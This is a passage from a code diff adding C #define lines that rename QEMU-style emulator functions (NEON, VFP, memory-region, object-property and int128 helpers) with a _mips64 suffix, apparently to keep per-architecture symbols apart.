helper_neon_qzip8_mips64 +#define helper_neon_rbit_u8 helper_neon_rbit_u8_mips64 +#define helper_neon_rhadd_s16 helper_neon_rhadd_s16_mips64 +#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_mips64 +#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_mips64 +#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_mips64 +#define helper_neon_rhadd_u32 helper_neon_rhadd_u32_mips64 +#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_mips64 +#define helper_neon_rshl_s16 helper_neon_rshl_s16_mips64 +#define helper_neon_rshl_s32 helper_neon_rshl_s32_mips64 +#define helper_neon_rshl_s64 helper_neon_rshl_s64_mips64 +#define helper_neon_rshl_s8 helper_neon_rshl_s8_mips64 +#define helper_neon_rshl_u16 helper_neon_rshl_u16_mips64 +#define helper_neon_rshl_u32 helper_neon_rshl_u32_mips64 +#define helper_neon_rshl_u64 helper_neon_rshl_u64_mips64 +#define helper_neon_rshl_u8 helper_neon_rshl_u8_mips64 +#define helper_neon_shl_s16 helper_neon_shl_s16_mips64 +#define helper_neon_shl_s32 helper_neon_shl_s32_mips64 +#define helper_neon_shl_s64 helper_neon_shl_s64_mips64 +#define helper_neon_shl_s8 helper_neon_shl_s8_mips64 +#define helper_neon_shl_u16 helper_neon_shl_u16_mips64 +#define helper_neon_shl_u32 helper_neon_shl_u32_mips64 +#define helper_neon_shl_u64 helper_neon_shl_u64_mips64 +#define helper_neon_shl_u8 helper_neon_shl_u8_mips64 +#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_mips64 +#define helper_neon_sqadd_u32 helper_neon_sqadd_u32_mips64 +#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_mips64 +#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_mips64 +#define helper_neon_subl_u16 helper_neon_subl_u16_mips64 +#define helper_neon_subl_u32 helper_neon_subl_u32_mips64 +#define helper_neon_sub_u16 helper_neon_sub_u16_mips64 +#define helper_neon_sub_u8 helper_neon_sub_u8_mips64 +#define helper_neon_tbl helper_neon_tbl_mips64 +#define helper_neon_tst_u16 helper_neon_tst_u16_mips64 +#define helper_neon_tst_u32 helper_neon_tst_u32_mips64 +#define helper_neon_tst_u8 helper_neon_tst_u8_mips64 +#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_mips64 +#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_mips64 +#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_mips64 +#define helper_neon_unzip16 helper_neon_unzip16_mips64 +#define helper_neon_unzip8 helper_neon_unzip8_mips64 +#define helper_neon_uqadd_s16 helper_neon_uqadd_s16_mips64 +#define helper_neon_uqadd_s32 helper_neon_uqadd_s32_mips64 +#define helper_neon_uqadd_s64 helper_neon_uqadd_s64_mips64 +#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_mips64 +#define helper_neon_widen_s16 helper_neon_widen_s16_mips64 +#define helper_neon_widen_s8 helper_neon_widen_s8_mips64 +#define helper_neon_widen_u16 helper_neon_widen_u16_mips64 +#define helper_neon_widen_u8 helper_neon_widen_u8_mips64 +#define helper_neon_zip16 helper_neon_zip16_mips64 +#define helper_neon_zip8 helper_neon_zip8_mips64 +#define helper_pre_hvc helper_pre_hvc_mips64 +#define helper_pre_smc helper_pre_smc_mips64 +#define helper_qadd16 helper_qadd16_mips64 +#define helper_qadd8 helper_qadd8_mips64 +#define helper_qaddsubx helper_qaddsubx_mips64 +#define helper_qsub16 helper_qsub16_mips64 +#define helper_qsub8 helper_qsub8_mips64 +#define helper_qsubaddx helper_qsubaddx_mips64 +#define helper_rbit helper_rbit_mips64 +#define helper_recpe_f32 helper_recpe_f32_mips64 +#define helper_recpe_f64 helper_recpe_f64_mips64 +#define helper_recpe_u32 helper_recpe_u32_mips64 +#define helper_recps_f32 helper_recps_f32_mips64 +#define helper_ret_ldb_cmmu helper_ret_ldb_cmmu_mips64 +#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_mips64 +#define helper_ret_ldub_mmu helper_ret_ldub_mmu_mips64 +#define helper_ret_stb_mmu helper_ret_stb_mmu_mips64 +#define helper_rintd helper_rintd_mips64 +#define helper_rintd_exact helper_rintd_exact_mips64 +#define helper_rints helper_rints_mips64 +#define helper_rints_exact helper_rints_exact_mips64 +#define helper_ror_cc helper_ror_cc_mips64 +#define helper_rsqrte_f32 helper_rsqrte_f32_mips64 +#define helper_rsqrte_f64 helper_rsqrte_f64_mips64 +#define helper_rsqrte_u32 helper_rsqrte_u32_mips64 +#define helper_rsqrts_f32 helper_rsqrts_f32_mips64 +#define helper_sadd16 helper_sadd16_mips64 +#define helper_sadd8 helper_sadd8_mips64 +#define helper_saddsubx helper_saddsubx_mips64 +#define helper_sar_cc helper_sar_cc_mips64 +#define helper_sdiv helper_sdiv_mips64 +#define helper_sel_flags helper_sel_flags_mips64 +#define helper_set_cp_reg helper_set_cp_reg_mips64 +#define helper_set_cp_reg64 helper_set_cp_reg64_mips64 +#define helper_set_neon_rmode helper_set_neon_rmode_mips64 +#define helper_set_r13_banked helper_set_r13_banked_mips64 +#define helper_set_rmode helper_set_rmode_mips64 +#define helper_set_user_reg helper_set_user_reg_mips64 +#define helper_shadd16 helper_shadd16_mips64 +#define helper_shadd8 helper_shadd8_mips64 +#define helper_shaddsubx helper_shaddsubx_mips64 +#define helper_shl_cc helper_shl_cc_mips64 +#define helper_shr_cc helper_shr_cc_mips64 +#define helper_shsub16 helper_shsub16_mips64 +#define helper_shsub8 helper_shsub8_mips64 +#define helper_shsubaddx helper_shsubaddx_mips64 +#define helper_ssat helper_ssat_mips64 +#define helper_ssat16 helper_ssat16_mips64 +#define helper_ssub16 helper_ssub16_mips64 +#define helper_ssub8 helper_ssub8_mips64 +#define helper_ssubaddx helper_ssubaddx_mips64 +#define helper_stb_mmu helper_stb_mmu_mips64 +#define helper_stl_mmu helper_stl_mmu_mips64 +#define helper_stq_mmu helper_stq_mmu_mips64 +#define helper_stw_mmu helper_stw_mmu_mips64 +#define helper_sub_saturate helper_sub_saturate_mips64 +#define helper_sub_usaturate helper_sub_usaturate_mips64 +#define helper_sxtb16 helper_sxtb16_mips64 +#define helper_uadd16 helper_uadd16_mips64 +#define helper_uadd8 helper_uadd8_mips64 +#define helper_uaddsubx helper_uaddsubx_mips64 +#define helper_udiv helper_udiv_mips64 +#define helper_uhadd16 helper_uhadd16_mips64 +#define helper_uhadd8 helper_uhadd8_mips64 +#define helper_uhaddsubx helper_uhaddsubx_mips64 +#define helper_uhsub16 helper_uhsub16_mips64 +#define helper_uhsub8 helper_uhsub8_mips64 +#define helper_uhsubaddx helper_uhsubaddx_mips64 +#define helper_uqadd16 helper_uqadd16_mips64 +#define helper_uqadd8 helper_uqadd8_mips64 +#define helper_uqaddsubx helper_uqaddsubx_mips64 +#define helper_uqsub16 helper_uqsub16_mips64 +#define helper_uqsub8 helper_uqsub8_mips64 +#define helper_uqsubaddx helper_uqsubaddx_mips64 +#define helper_usad8 helper_usad8_mips64 +#define helper_usat helper_usat_mips64 +#define helper_usat16 helper_usat16_mips64 +#define helper_usub16 helper_usub16_mips64 +#define helper_usub8 helper_usub8_mips64 +#define helper_usubaddx helper_usubaddx_mips64 +#define helper_uxtb16 helper_uxtb16_mips64 +#define helper_v7m_mrs helper_v7m_mrs_mips64 +#define helper_v7m_msr helper_v7m_msr_mips64 +#define helper_vfp_absd helper_vfp_absd_mips64 +#define helper_vfp_abss helper_vfp_abss_mips64 +#define helper_vfp_addd helper_vfp_addd_mips64 +#define helper_vfp_adds helper_vfp_adds_mips64 +#define helper_vfp_cmpd helper_vfp_cmpd_mips64 +#define helper_vfp_cmped helper_vfp_cmped_mips64 +#define helper_vfp_cmpes helper_vfp_cmpes_mips64 +#define helper_vfp_cmps helper_vfp_cmps_mips64 +#define helper_vfp_divd helper_vfp_divd_mips64 +#define helper_vfp_divs helper_vfp_divs_mips64 +#define helper_vfp_fcvtds helper_vfp_fcvtds_mips64 +#define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_mips64 +#define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_mips64 +#define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_mips64 +#define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_mips64 +#define helper_vfp_fcvtsd helper_vfp_fcvtsd_mips64 +#define helper_vfp_get_fpscr helper_vfp_get_fpscr_mips64 +#define helper_vfp_maxd helper_vfp_maxd_mips64 +#define helper_vfp_maxnumd helper_vfp_maxnumd_mips64 +#define helper_vfp_maxnums helper_vfp_maxnums_mips64 +#define helper_vfp_maxs helper_vfp_maxs_mips64 +#define helper_vfp_mind helper_vfp_mind_mips64 +#define helper_vfp_minnumd helper_vfp_minnumd_mips64 +#define helper_vfp_minnums helper_vfp_minnums_mips64 +#define helper_vfp_mins helper_vfp_mins_mips64 +#define helper_vfp_muladdd helper_vfp_muladdd_mips64 +#define helper_vfp_muladds helper_vfp_muladds_mips64 +#define helper_vfp_muld helper_vfp_muld_mips64 +#define helper_vfp_muls helper_vfp_muls_mips64 +#define helper_vfp_negd helper_vfp_negd_mips64 +#define helper_vfp_negs helper_vfp_negs_mips64 +#define helper_vfp_set_fpscr helper_vfp_set_fpscr_mips64 +#define helper_vfp_shtod helper_vfp_shtod_mips64 +#define helper_vfp_shtos helper_vfp_shtos_mips64 +#define helper_vfp_sitod helper_vfp_sitod_mips64 +#define helper_vfp_sitos helper_vfp_sitos_mips64 +#define helper_vfp_sltod helper_vfp_sltod_mips64 +#define helper_vfp_sltos helper_vfp_sltos_mips64 +#define helper_vfp_sqrtd helper_vfp_sqrtd_mips64 +#define helper_vfp_sqrts helper_vfp_sqrts_mips64 +#define helper_vfp_sqtod helper_vfp_sqtod_mips64 +#define helper_vfp_sqtos helper_vfp_sqtos_mips64 +#define helper_vfp_subd helper_vfp_subd_mips64 +#define helper_vfp_subs helper_vfp_subs_mips64 +#define helper_vfp_toshd helper_vfp_toshd_mips64 +#define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_mips64 +#define helper_vfp_toshs helper_vfp_toshs_mips64 +#define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_mips64 +#define helper_vfp_tosid helper_vfp_tosid_mips64 +#define helper_vfp_tosis helper_vfp_tosis_mips64 +#define helper_vfp_tosizd helper_vfp_tosizd_mips64 +#define helper_vfp_tosizs helper_vfp_tosizs_mips64 +#define helper_vfp_tosld helper_vfp_tosld_mips64 +#define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_mips64 +#define helper_vfp_tosls helper_vfp_tosls_mips64 +#define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_mips64 +#define helper_vfp_tosqd helper_vfp_tosqd_mips64 +#define helper_vfp_tosqs helper_vfp_tosqs_mips64 +#define helper_vfp_touhd helper_vfp_touhd_mips64 +#define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_mips64 +#define helper_vfp_touhs helper_vfp_touhs_mips64 +#define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_mips64 +#define helper_vfp_touid helper_vfp_touid_mips64 +#define helper_vfp_touis helper_vfp_touis_mips64 +#define helper_vfp_touizd helper_vfp_touizd_mips64 +#define helper_vfp_touizs helper_vfp_touizs_mips64 +#define helper_vfp_tould helper_vfp_tould_mips64 +#define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_mips64 +#define helper_vfp_touls helper_vfp_touls_mips64 +#define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_mips64 +#define helper_vfp_touqd helper_vfp_touqd_mips64 +#define helper_vfp_touqs helper_vfp_touqs_mips64 +#define helper_vfp_uhtod helper_vfp_uhtod_mips64 +#define helper_vfp_uhtos helper_vfp_uhtos_mips64 +#define helper_vfp_uitod helper_vfp_uitod_mips64 +#define helper_vfp_uitos helper_vfp_uitos_mips64 +#define helper_vfp_ultod helper_vfp_ultod_mips64 +#define helper_vfp_ultos helper_vfp_ultos_mips64 +#define helper_vfp_uqtod helper_vfp_uqtod_mips64 +#define helper_vfp_uqtos helper_vfp_uqtos_mips64 +#define helper_wfe helper_wfe_mips64 +#define helper_wfi helper_wfi_mips64 +#define hex2decimal hex2decimal_mips64 +#define hw_breakpoint_update hw_breakpoint_update_mips64 +#define hw_breakpoint_update_all hw_breakpoint_update_all_mips64 +#define hw_watchpoint_update hw_watchpoint_update_mips64 +#define hw_watchpoint_update_all hw_watchpoint_update_all_mips64 +#define _init _init_mips64 +#define init_cpreg_list init_cpreg_list_mips64 +#define init_lists init_lists_mips64 +#define input_type_enum input_type_enum_mips64 +#define int128_2_64 int128_2_64_mips64 +#define int128_add int128_add_mips64 +#define int128_addto int128_addto_mips64 +#define int128_and int128_and_mips64 +#define int128_eq int128_eq_mips64 +#define int128_ge int128_ge_mips64 +#define int128_get64 int128_get64_mips64 +#define int128_gt int128_gt_mips64 +#define int128_le int128_le_mips64 +#define int128_lt int128_lt_mips64 +#define int128_make64 int128_make64_mips64 +#define int128_max int128_max_mips64 +#define int128_min int128_min_mips64 +#define int128_ne int128_ne_mips64 +#define int128_neg int128_neg_mips64 +#define int128_nz int128_nz_mips64 +#define int128_rshift int128_rshift_mips64 +#define int128_sub int128_sub_mips64 +#define int128_subfrom int128_subfrom_mips64 +#define int128_zero int128_zero_mips64 +#define int16_to_float32 int16_to_float32_mips64 +#define int16_to_float64 int16_to_float64_mips64 +#define int32_to_float128 int32_to_float128_mips64 +#define int32_to_float32 int32_to_float32_mips64 +#define int32_to_float64 int32_to_float64_mips64 +#define int32_to_floatx80 int32_to_floatx80_mips64 +#define int64_to_float128 int64_to_float128_mips64 +#define int64_to_float32 int64_to_float32_mips64 +#define int64_to_float64 int64_to_float64_mips64 +#define int64_to_floatx80 int64_to_floatx80_mips64 +#define invalidate_and_set_dirty invalidate_and_set_dirty_mips64 +#define invalidate_page_bitmap invalidate_page_bitmap_mips64 +#define io_mem_read io_mem_read_mips64 +#define io_mem_write io_mem_write_mips64 +#define io_readb io_readb_mips64 +#define io_readl io_readl_mips64 +#define io_readq io_readq_mips64 +#define io_readw io_readw_mips64 +#define iotlb_to_region iotlb_to_region_mips64 +#define io_writeb io_writeb_mips64 +#define io_writel io_writel_mips64 +#define io_writeq io_writeq_mips64 +#define io_writew io_writew_mips64 +#define is_a64 is_a64_mips64 +#define is_help_option is_help_option_mips64 +#define isr_read isr_read_mips64 +#define is_valid_option_list is_valid_option_list_mips64 +#define iwmmxt_load_creg iwmmxt_load_creg_mips64 +#define iwmmxt_load_reg iwmmxt_load_reg_mips64 +#define iwmmxt_store_creg iwmmxt_store_creg_mips64 +#define iwmmxt_store_reg iwmmxt_store_reg_mips64 +#define __jit_debug_descriptor __jit_debug_descriptor_mips64 +#define __jit_debug_register_code __jit_debug_register_code_mips64 +#define kvm_to_cpreg_id kvm_to_cpreg_id_mips64 +#define last_ram_offset last_ram_offset_mips64 +#define ldl_be_p ldl_be_p_mips64 +#define ldl_be_phys ldl_be_phys_mips64 +#define ldl_he_p ldl_he_p_mips64 +#define ldl_le_p ldl_le_p_mips64 +#define ldl_le_phys ldl_le_phys_mips64 +#define ldl_phys ldl_phys_mips64 +#define ldl_phys_internal ldl_phys_internal_mips64 +#define ldq_be_p ldq_be_p_mips64 +#define ldq_be_phys ldq_be_phys_mips64 +#define ldq_he_p ldq_he_p_mips64 +#define ldq_le_p ldq_le_p_mips64 +#define ldq_le_phys ldq_le_phys_mips64 +#define ldq_phys ldq_phys_mips64 +#define ldq_phys_internal ldq_phys_internal_mips64 +#define ldst_name ldst_name_mips64 +#define ldub_p ldub_p_mips64 +#define ldub_phys ldub_phys_mips64 +#define lduw_be_p lduw_be_p_mips64 +#define lduw_be_phys lduw_be_phys_mips64 +#define lduw_he_p lduw_he_p_mips64 +#define lduw_le_p lduw_le_p_mips64 +#define lduw_le_phys lduw_le_phys_mips64 +#define lduw_phys lduw_phys_mips64 +#define lduw_phys_internal lduw_phys_internal_mips64 +#define le128 le128_mips64 +#define linked_bp_matches linked_bp_matches_mips64 +#define listener_add_address_space listener_add_address_space_mips64 +#define load_cpu_offset load_cpu_offset_mips64 +#define load_reg load_reg_mips64 +#define load_reg_var load_reg_var_mips64 +#define log_cpu_state log_cpu_state_mips64 +#define lpae_cp_reginfo lpae_cp_reginfo_mips64 +#define lt128 lt128_mips64 +#define machine_class_init machine_class_init_mips64 +#define machine_finalize machine_finalize_mips64 +#define machine_info machine_info_mips64 +#define machine_initfn machine_initfn_mips64 +#define machine_register_types machine_register_types_mips64 +#define machvirt_init machvirt_init_mips64 +#define machvirt_machine_init machvirt_machine_init_mips64 +#define maj maj_mips64 +#define mapping_conflict mapping_conflict_mips64 +#define mapping_contiguous mapping_contiguous_mips64 +#define mapping_have_same_region mapping_have_same_region_mips64 +#define mapping_merge mapping_merge_mips64 +#define mem_add mem_add_mips64 +#define mem_begin mem_begin_mips64 +#define mem_commit mem_commit_mips64 +#define memory_access_is_direct memory_access_is_direct_mips64 +#define memory_access_size memory_access_size_mips64 +#define memory_init memory_init_mips64 +#define memory_listener_match memory_listener_match_mips64 +#define memory_listener_register memory_listener_register_mips64 +#define memory_listener_unregister memory_listener_unregister_mips64 +#define memory_map_init memory_map_init_mips64 +#define memory_mapping_filter memory_mapping_filter_mips64 +#define memory_mapping_list_add_mapping_sorted memory_mapping_list_add_mapping_sorted_mips64 +#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_mips64 +#define memory_mapping_list_free memory_mapping_list_free_mips64 +#define memory_mapping_list_init memory_mapping_list_init_mips64 +#define memory_region_access_valid memory_region_access_valid_mips64 +#define memory_region_add_subregion memory_region_add_subregion_mips64 +#define memory_region_add_subregion_common memory_region_add_subregion_common_mips64 +#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_mips64 +#define memory_region_big_endian memory_region_big_endian_mips64 +#define memory_region_clear_pending memory_region_clear_pending_mips64 +#define memory_region_del_subregion memory_region_del_subregion_mips64 +#define memory_region_destructor_alias memory_region_destructor_alias_mips64 +#define memory_region_destructor_none memory_region_destructor_none_mips64 +#define memory_region_destructor_ram memory_region_destructor_ram_mips64 +#define memory_region_destructor_ram_from_ptr memory_region_destructor_ram_from_ptr_mips64 +#define memory_region_dispatch_read memory_region_dispatch_read_mips64 +#define memory_region_dispatch_read1 memory_region_dispatch_read1_mips64 +#define memory_region_dispatch_write memory_region_dispatch_write_mips64 +#define memory_region_escape_name memory_region_escape_name_mips64 +#define memory_region_finalize memory_region_finalize_mips64 +#define memory_region_find memory_region_find_mips64 +#define memory_region_get_addr memory_region_get_addr_mips64 +#define memory_region_get_alignment memory_region_get_alignment_mips64 +#define memory_region_get_container memory_region_get_container_mips64 +#define memory_region_get_fd memory_region_get_fd_mips64 +#define memory_region_get_may_overlap memory_region_get_may_overlap_mips64 +#define memory_region_get_priority memory_region_get_priority_mips64 +#define memory_region_get_ram_addr memory_region_get_ram_addr_mips64 +#define memory_region_get_ram_ptr memory_region_get_ram_ptr_mips64 +#define memory_region_get_size memory_region_get_size_mips64 +#define memory_region_info memory_region_info_mips64 +#define memory_region_init memory_region_init_mips64 +#define memory_region_init_alias memory_region_init_alias_mips64 +#define memory_region_initfn memory_region_initfn_mips64 +#define memory_region_init_io memory_region_init_io_mips64 +#define memory_region_init_ram memory_region_init_ram_mips64 +#define memory_region_init_ram_ptr memory_region_init_ram_ptr_mips64 +#define memory_region_init_reservation memory_region_init_reservation_mips64 +#define memory_region_is_iommu memory_region_is_iommu_mips64 +#define memory_region_is_logging memory_region_is_logging_mips64 +#define memory_region_is_mapped memory_region_is_mapped_mips64 +#define memory_region_is_ram memory_region_is_ram_mips64 +#define memory_region_is_rom memory_region_is_rom_mips64 +#define memory_region_is_romd memory_region_is_romd_mips64 +#define memory_region_is_skip_dump memory_region_is_skip_dump_mips64 +#define memory_region_is_unassigned memory_region_is_unassigned_mips64 +#define memory_region_name memory_region_name_mips64 +#define memory_region_need_escape memory_region_need_escape_mips64 +#define memory_region_oldmmio_read_accessor memory_region_oldmmio_read_accessor_mips64 +#define memory_region_oldmmio_write_accessor memory_region_oldmmio_write_accessor_mips64 +#define memory_region_present memory_region_present_mips64 +#define memory_region_read_accessor memory_region_read_accessor_mips64 +#define memory_region_readd_subregion memory_region_readd_subregion_mips64 +#define memory_region_ref memory_region_ref_mips64 +#define memory_region_resolve_container memory_region_resolve_container_mips64 +#define memory_region_rom_device_set_romd memory_region_rom_device_set_romd_mips64 +#define memory_region_section_get_iotlb memory_region_section_get_iotlb_mips64 +#define memory_region_set_address memory_region_set_address_mips64 +#define memory_region_set_alias_offset memory_region_set_alias_offset_mips64 +#define memory_region_set_enabled memory_region_set_enabled_mips64 +#define memory_region_set_readonly memory_region_set_readonly_mips64 +#define memory_region_set_skip_dump memory_region_set_skip_dump_mips64 +#define memory_region_size memory_region_size_mips64 +#define memory_region_to_address_space memory_region_to_address_space_mips64 +#define memory_region_transaction_begin memory_region_transaction_begin_mips64 +#define memory_region_transaction_commit memory_region_transaction_commit_mips64 +#define memory_region_unref memory_region_unref_mips64 +#define memory_region_update_container_subregions memory_region_update_container_subregions_mips64 +#define memory_region_write_accessor memory_region_write_accessor_mips64 +#define memory_region_wrong_endianness memory_region_wrong_endianness_mips64 +#define memory_try_enable_merging memory_try_enable_merging_mips64 +#define module_call_init module_call_init_mips64 +#define module_load module_load_mips64 +#define mpidr_cp_reginfo mpidr_cp_reginfo_mips64 +#define mpidr_read mpidr_read_mips64 +#define msr_mask msr_mask_mips64 +#define mul128By64To192 mul128By64To192_mips64 +#define mul128To256 mul128To256_mips64 +#define mul64To128 mul64To128_mips64 +#define muldiv64 muldiv64_mips64 +#define neon_2rm_is_float_op neon_2rm_is_float_op_mips64 +#define neon_2rm_sizes neon_2rm_sizes_mips64 +#define neon_3r_sizes neon_3r_sizes_mips64 +#define neon_get_scalar neon_get_scalar_mips64 +#define neon_load_reg neon_load_reg_mips64 +#define neon_load_reg64 neon_load_reg64_mips64 +#define neon_load_scratch neon_load_scratch_mips64 +#define neon_ls_element_type neon_ls_element_type_mips64 +#define neon_reg_offset neon_reg_offset_mips64 +#define neon_store_reg neon_store_reg_mips64 +#define neon_store_reg64 neon_store_reg64_mips64 +#define neon_store_scratch neon_store_scratch_mips64 +#define new_ldst_label new_ldst_label_mips64 +#define next_list next_list_mips64 +#define normalizeFloat128Subnormal normalizeFloat128Subnormal_mips64 +#define normalizeFloat16Subnormal normalizeFloat16Subnormal_mips64 +#define normalizeFloat32Subnormal normalizeFloat32Subnormal_mips64 +#define normalizeFloat64Subnormal normalizeFloat64Subnormal_mips64 +#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_mips64 +#define normalizeRoundAndPackFloat128 normalizeRoundAndPackFloat128_mips64 +#define normalizeRoundAndPackFloat32 normalizeRoundAndPackFloat32_mips64 +#define normalizeRoundAndPackFloat64 normalizeRoundAndPackFloat64_mips64 +#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_mips64 +#define not_v6_cp_reginfo not_v6_cp_reginfo_mips64 +#define not_v7_cp_reginfo not_v7_cp_reginfo_mips64 +#define not_v8_cp_reginfo not_v8_cp_reginfo_mips64 +#define object_child_foreach object_child_foreach_mips64 +#define object_class_foreach object_class_foreach_mips64 +#define object_class_foreach_tramp object_class_foreach_tramp_mips64 +#define object_class_get_list object_class_get_list_mips64 +#define object_class_get_list_tramp object_class_get_list_tramp_mips64 +#define object_class_get_parent object_class_get_parent_mips64 +#define object_deinit object_deinit_mips64 +#define object_dynamic_cast object_dynamic_cast_mips64 +#define object_finalize object_finalize_mips64 +#define object_finalize_child_property object_finalize_child_property_mips64 +#define object_get_child_property object_get_child_property_mips64 +#define object_get_link_property object_get_link_property_mips64 +#define object_get_root object_get_root_mips64 +#define object_initialize_with_type object_initialize_with_type_mips64 +#define object_init_with_type object_init_with_type_mips64 +#define object_instance_init object_instance_init_mips64 +#define object_new_with_type object_new_with_type_mips64 +#define object_post_init_with_type object_post_init_with_type_mips64 +#define object_property_add_alias object_property_add_alias_mips64 +#define object_property_add_link object_property_add_link_mips64 +#define object_property_add_uint16_ptr object_property_add_uint16_ptr_mips64 +#define object_property_add_uint32_ptr object_property_add_uint32_ptr_mips64 +#define object_property_add_uint64_ptr object_property_add_uint64_ptr_mips64 +#define object_property_add_uint8_ptr object_property_add_uint8_ptr_mips64 +#define object_property_allow_set_link object_property_allow_set_link_mips64 +#define object_property_del object_property_del_mips64 +#define object_property_del_all object_property_del_all_mips64 +#define object_property_find object_property_find_mips64 +#define object_property_get object_property_get_mips64 +#define object_property_get_bool object_property_get_bool_mips64 +#define object_property_get_int object_property_get_int_mips64 +#define object_property_get_link object_property_get_link_mips64 +#define object_property_get_qobject object_property_get_qobject_mips64 +#define object_property_get_str object_property_get_str_mips64 +#define object_property_get_type object_property_get_type_mips64 +#define object_property_is_child object_property_is_child_mips64 +#define object_property_set object_property_set_mips64 +#define object_property_set_description object_property_set_description_mips64 +#define object_property_set_link object_property_set_link_mips64 +#define object_property_set_qobject object_property_set_qobject_mips64 +#define object_release_link_property object_release_link_property_mips64 +#define object_resolve_abs_path object_resolve_abs_path_mips64 +#define object_resolve_child_property object_resolve_child_property_mips64 +#define object_resolve_link object_resolve_link_mips64 +#define object_resolve_link_property object_resolve_link_property_mips64 +#define object_resolve_partial_path object_resolve_partial_path_mips64 +#define object_resolve_path object_resolve_path_mips64 +#define object_resolve_path_component object_resolve_path_component_mips64 +#define object_resolve_path_type object_resolve_path_type_mips64 +#define object_set_link_property object_set_link_property_mips64 +#define object_unparent object_unparent_mips64 +#define omap_cachemaint_write omap_cachemaint_write_mips64 +#define omap_cp_reginfo omap_cp_reginfo_mips64 +#define omap_threadid_write omap_threadid_write_mips64 +#define omap_ticonfig_write omap_ticonfig_write_mips64 +#define omap_wfi_write omap_wfi_write_mips64 +#define op_bits op_bits_mips64 +#define open_modeflags open_modeflags_mips64 +#define op_to_mov op_to_mov_mips64 +#define op_to_movi op_to_movi_mips64 +#define output_type_enum output_type_enum_mips64 +#define packFloat128 packFloat128_mips64 +#define packFloat16 packFloat16_mips64 +#define packFloat32 packFloat32_mips64 +#define packFloat64 packFloat64_mips64 +#define packFloatx80 packFloatx80_mips64 +#define page_find page_find_mips64 +#define page_find_alloc page_find_alloc_mips64 +#define page_flush_tb page_flush_tb_mips64 +#define page_flush_tb_1 page_flush_tb_1_mips64 +#define page_init page_init_mips64 +#define page_size_init page_size_init_mips64 +#define par par_mips64 +#define parse_array parse_array_mips64 +#define parse_error parse_error_mips64 +#define parse_escape parse_escape_mips64 +#define parse_keyword parse_keyword_mips64 +#define parse_literal parse_literal_mips64 +#define parse_object parse_object_mips64 +#define parse_optional parse_optional_mips64 +#define parse_option_bool parse_option_bool_mips64 +#define parse_option_number parse_option_number_mips64 +#define parse_option_size parse_option_size_mips64 +#define parse_pair parse_pair_mips64 +#define parser_context_free parser_context_free_mips64 +#define parser_context_new parser_context_new_mips64 +#define parser_context_peek_token parser_context_peek_token_mips64 +#define parser_context_pop_token parser_context_pop_token_mips64 +#define parser_context_restore parser_context_restore_mips64 +#define parser_context_save parser_context_save_mips64 +#define parse_str parse_str_mips64 +#define parse_type_bool parse_type_bool_mips64 +#define parse_type_int parse_type_int_mips64 +#define parse_type_number parse_type_number_mips64 +#define parse_type_size parse_type_size_mips64 +#define parse_type_str parse_type_str_mips64 +#define parse_value parse_value_mips64 +#define par_write par_write_mips64 +#define patch_reloc patch_reloc_mips64 +#define phys_map_node_alloc phys_map_node_alloc_mips64 +#define phys_map_node_reserve phys_map_node_reserve_mips64 +#define phys_mem_alloc phys_mem_alloc_mips64 +#define phys_mem_set_alloc phys_mem_set_alloc_mips64 +#define phys_page_compact phys_page_compact_mips64 +#define phys_page_compact_all phys_page_compact_all_mips64 +#define phys_page_find phys_page_find_mips64 +#define phys_page_set phys_page_set_mips64 +#define phys_page_set_level phys_page_set_level_mips64 +#define phys_section_add phys_section_add_mips64 +#define phys_section_destroy phys_section_destroy_mips64 +#define phys_sections_free phys_sections_free_mips64 +#define pickNaN pickNaN_mips64 +#define pickNaNMulAdd pickNaNMulAdd_mips64 +#define pmccfiltr_write pmccfiltr_write_mips64 +#define pmccntr_read pmccntr_read_mips64 +#define pmccntr_sync pmccntr_sync_mips64 +#define pmccntr_write pmccntr_write_mips64 +#define pmccntr_write32 pmccntr_write32_mips64 +#define pmcntenclr_write pmcntenclr_write_mips64 +#define pmcntenset_write pmcntenset_write_mips64 +#define pmcr_write pmcr_write_mips64 +#define pmintenclr_write pmintenclr_write_mips64 +#define pmintenset_write pmintenset_write_mips64 +#define pmovsr_write pmovsr_write_mips64 +#define pmreg_access pmreg_access_mips64 +#define pmsav5_cp_reginfo pmsav5_cp_reginfo_mips64 +#define pmsav5_data_ap_read pmsav5_data_ap_read_mips64 +#define pmsav5_data_ap_write pmsav5_data_ap_write_mips64 +#define pmsav5_insn_ap_read pmsav5_insn_ap_read_mips64 +#define pmsav5_insn_ap_write pmsav5_insn_ap_write_mips64 +#define pmuserenr_write pmuserenr_write_mips64 +#define pmxevtyper_write pmxevtyper_write_mips64 +#define print_type_bool print_type_bool_mips64 +#define print_type_int print_type_int_mips64 +#define print_type_number print_type_number_mips64 +#define print_type_size print_type_size_mips64 +#define print_type_str print_type_str_mips64 +#define propagateFloat128NaN propagateFloat128NaN_mips64 +#define propagateFloat32MulAddNaN propagateFloat32MulAddNaN_mips64 +#define propagateFloat32NaN propagateFloat32NaN_mips64 +#define propagateFloat64MulAddNaN 